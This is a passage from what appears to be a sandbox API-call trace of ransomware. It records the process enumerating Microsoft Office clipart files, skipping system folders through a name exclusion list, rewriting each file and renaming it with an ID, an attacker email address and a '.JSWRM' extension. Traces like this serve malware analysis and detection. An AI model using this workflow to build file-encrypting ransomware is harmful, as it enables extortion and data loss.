lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0082.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0082.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0082.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0082.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0082.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.405] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107484.WMF", cAlternateFileName="")) returned 1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2=".") returned 1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="..") returned 1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="...") returned 1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="windows") returned -1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="recovery") returned -1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="perflogs") returned -1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="documents and settings") returned 1 [0082.405] lstrcmpiW (lpString1="J0107484.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.406] lstrcmpiW (lpString1="J0107484.WMF", lpString2="system volume information") returned -1 [0082.406] lstrcmpiW (lpString1="J0107484.WMF", lpString2="msocache") returned -1 [0082.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0082.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107484.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107484.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107484.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0082.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0082.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107484.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107484.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107484.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0082.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.406] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3040) returned 1 [0082.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe0) returned 0x23fc98 [0082.406] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbe0, lpOverlapped=0x0) returned 1 [0082.408] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.408] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbe0, lpOverlapped=0x0) returned 1 [0082.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.408] CloseHandle (hObject=0x314) returned 1 [0082.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0082.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0082.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0082.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0082.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.409] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.409] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107488.WMF", cAlternateFileName="")) returned 1 [0082.409] lstrcmpiW (lpString1="J0107488.WMF", lpString2=".") returned 1 [0082.409] lstrcmpiW (lpString1="J0107488.WMF", lpString2="..") returned 1 [0082.409] lstrcmpiW (lpString1="J0107488.WMF", lpString2="...") returned 1 [0082.409] lstrcmpiW (lpString1="J0107488.WMF", lpString2="windows") returned -1 [0082.409] lstrcmpiW (lpString1="J0107488.WMF", lpString2="recovery") returned -1 [0082.409] lstrcmpiW (lpString1="J0107488.WMF", lpString2="perflogs") returned -1 [0082.410] lstrcmpiW (lpString1="J0107488.WMF", lpString2="documents and settings") returned 1 [0082.410] lstrcmpiW (lpString1="J0107488.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.410] lstrcmpiW (lpString1="J0107488.WMF", lpString2="system volume information") returned -1 [0082.410] lstrcmpiW (lpString1="J0107488.WMF", lpString2="msocache") returned -1 [0082.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107488.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107488.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107488.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0082.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107488.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107488.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107488.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0082.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0082.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8000) returned 1 [0082.411] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f40) returned 0x205850 [0082.411] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f40, lpOverlapped=0x0) returned 1 [0082.413] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.413] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f40, lpOverlapped=0x0) returned 1 [0082.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.413] CloseHandle (hObject=0x314) returned 1 [0082.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0082.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0082.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0082.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0082.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0082.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.413] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0082.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0082.414] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4054, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107490.WMF", cAlternateFileName="")) returned 1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2=".") returned 1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="..") returned 1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="...") returned 1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="windows") returned -1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="recovery") returned -1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="perflogs") returned -1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="documents and settings") returned 1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="system volume information") returned -1 [0082.414] lstrcmpiW (lpString1="J0107490.WMF", lpString2="msocache") returned -1 [0082.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0082.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107490.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107490.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107490.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0082.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0082.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107490.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107490.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107490.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0082.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.415] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16468) returned 1 [0082.415] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4050) returned 0x24d210 [0082.415] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4050, lpOverlapped=0x0) returned 1 [0082.505] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.505] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4050, lpOverlapped=0x0) returned 1 [0082.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.526] CloseHandle (hObject=0x314) returned 1 [0082.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0082.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0082.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0082.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0082.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0082.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0082.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0082.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.550] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1acc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107492.WMF", cAlternateFileName="")) returned 1 [0082.550] lstrcmpiW (lpString1="J0107492.WMF", lpString2=".") returned 1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="..") returned 1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="...") returned 1 [0082.551] 